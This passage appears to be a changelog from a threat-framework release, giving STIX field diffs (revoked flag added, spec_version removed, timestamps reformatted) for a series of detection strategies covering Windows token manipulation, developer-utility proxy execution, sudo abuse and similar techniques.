collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.681000+00:00</td></tr></tbody></table></details><hr><h4>[DET0482] Behavior-chain detection for T1134.001 Access Token Manipulation: Token Impersonation/Theft on Windows</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.668000+00:00</td></tr></tbody></table></details><hr><h4>[DET0456] Behavior-chain detection for T1134.002 Create Process with Token (Windows)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.681000+00:00</td></tr></tbody></table></details><hr><h4>[DET0489] Behavior-chain detection for T1134.004 Access Token Manipulation: Parent PID Spoofing (Windows)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.696000+00:00</td></tr></tbody></table></details><hr><h4>[DET0136] Behavior-chain detection for T1134.005 Access Token Manipulation: SID-History Injection (Windows)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.694000+00:00</td></tr></tbody></table></details><hr><h4>[DET0182] Behavior-chain detection for T1135 Network Share Discovery across Windows, Linux, and macOS</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.696000+00:00</td></tr></tbody></table></details><hr><h4>[DET0249] Behavior-chain detection for T1610 Deploy Container across Docker & Kubernetes control/node planes</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.685000+00:00</td></tr></tbody></table></details><hr><h4>[DET0556] Behavior-chain detection strategy for T1127.001 Trusted Developer Utilities Proxy Execution: MSBuild (Windows)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.679000+00:00</td></tr></tbody></table></details><hr><h4>[DET0191] Behavior-chain detection strategy for T1127.002 Trusted Developer Utilities Proxy Execution: ClickOnce (Windows)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.696000+00:00</td></tr></tbody></table></details><hr><h4>[DET0585] Behavior-chain detection strategy for T1127.003 Trusted Developer Utilities Proxy Execution: JamPlus (Windows)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.679000+00:00</td></tr></tbody></table></details><hr><h4>[DET0151] Behavior-chain, platform-aware detection strategy for T1124 System Time Discovery</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.685000+00:00</td></tr></tbody></table></details><hr><h4>[DET0197] Behavior-chain, platform-aware detection strategy for T1125 Video Capture</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.696000+00:00</td></tr></tbody></table></details><hr><h4>[DET0172] Behavior-chain, platform-aware detection strategy for T1127 Trusted Developer Utilities Proxy Execution (Windows)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.697000+00:00</td></tr></tbody></table></details><hr><h4>[DET0018] Behavior-chain, platform-aware detection strategy for T1129 Shared Modules</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.685000+00:00</td></tr></tbody></table></details><hr><h4>[DET0052] Behavioral Detection Strategy for Abuse of Sudo and Sudo Caching</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.673000+00:00</td></tr></tbody></table></details><hr><h4>[DET0131] Behavioral Detection Strategy for Exfiltration Over Alternative Protocol</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: 